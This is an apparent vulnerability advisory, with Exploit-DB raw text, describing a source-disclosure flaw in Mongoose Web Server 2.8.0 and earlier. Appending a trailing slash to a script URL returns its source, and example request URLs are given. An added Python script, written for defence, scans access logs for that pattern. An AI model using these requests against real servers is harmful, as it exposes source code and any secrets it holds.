Vendor: Mongoose Web Server
By: Dr_IDE
CVSS: 7.5 (HIGH)
Vulnerability: Remote Source Disclosure
CWE: 200
Product Name: Mongoose Web Server
Affected Version From: Mongoose Web Server <= 2.8.0
Affected Version To: Mongoose Web Server <= 2.8.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mongoose:mongoose_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XPSP3
Found By: Dr_IDE in 2009

Mongoose Web Server <= 2.8.0 Remote Source Disclosure

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server. This is the latest version of the application available. Mongoose is vulnerable to remote arbitrary source code disclosure by the following means.

http://[ webserver IP][:port]/[ file ][/]

http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/

Mitigation:

Ensure that the web server is configured to only serve files from the intended directory and that the directory is not accessible from the web.
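
To check whether this request pattern (a file name followed by a trailing slash) already appears in a server's access logs, the following is an added example and not part of the original advisory. It assumes Common Log Format; the extension list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: Common Log Format access lines; adjust the regex for other formats.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Assumption: extensions that normally name a file, never a directory.
FILE_EXT = re.compile(r'\.(?:php|cgi|pl|py|asp|shtml|html?)$', re.IGNORECASE)


def trailing_slash_file(target: str) -> bool:
    """True when the request path is <file.ext> followed by one or more slashes."""
    # Drop the query string and decode percent-escapes before inspecting the path.
    path = unquote(urlsplit(target).path)
    stripped = path.rstrip("/")
    return stripped != path and bool(FILE_EXT.search(stripped))


def suspicious_requests(lines):
    """Return (ip, target, status) for 2xx responses to file-with-trailing-slash paths."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a parsable access-log line
        # A 2xx status means the server answered with content rather than an error.
        if m["status"].startswith("2") and trailing_slash_file(m["target"]):
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php/ HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jan/2010:10:01:00 +0000] "GET /docs/ HTTP/1.1" 200 1024',
    '192.0.2.13 - - [01/Jan/2010:10:03:00 +0000] "GET /admin.php/ HTTP/1.1" 404 0',
    '192.0.2.14 - - [01/Jan/2010:10:04:00 +0000] "GET /index.html/?x=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, target, status in suspicious_requests(SAMPLE):
        print(f"{ip} {status} {target}")
```

Applications that route on PATH_INFO can produce the same path shape legitimately, so hits should be compared against how the site normally serves those files.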

Exploit-DB raw data:

#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By:	Dr_IDE
# Tested On:	Windows XPSP3
# Download: 	http://code.google.com/p/mongoose/
#
#######################################################

- Description -

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.

Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.

- Technical Details -

http://[ webserver IP][:port]/[ file ][/]

http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/

#[pocoftheday.blogspot.com]